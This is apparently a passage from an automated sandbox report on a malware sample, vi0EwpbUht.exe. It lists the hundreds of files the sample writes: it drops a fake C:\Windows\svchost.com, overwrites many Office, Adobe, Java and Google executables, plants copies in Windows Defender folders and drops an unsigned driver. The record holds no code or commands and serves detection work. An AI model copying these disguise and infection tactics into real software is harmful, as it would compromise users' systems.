          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Sample is not signed and drops a device driverShow sources
          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.com
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeFile created: C:\Users\user\AppData\Local\Temp\nsrAB5E.tmp\System.dll
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
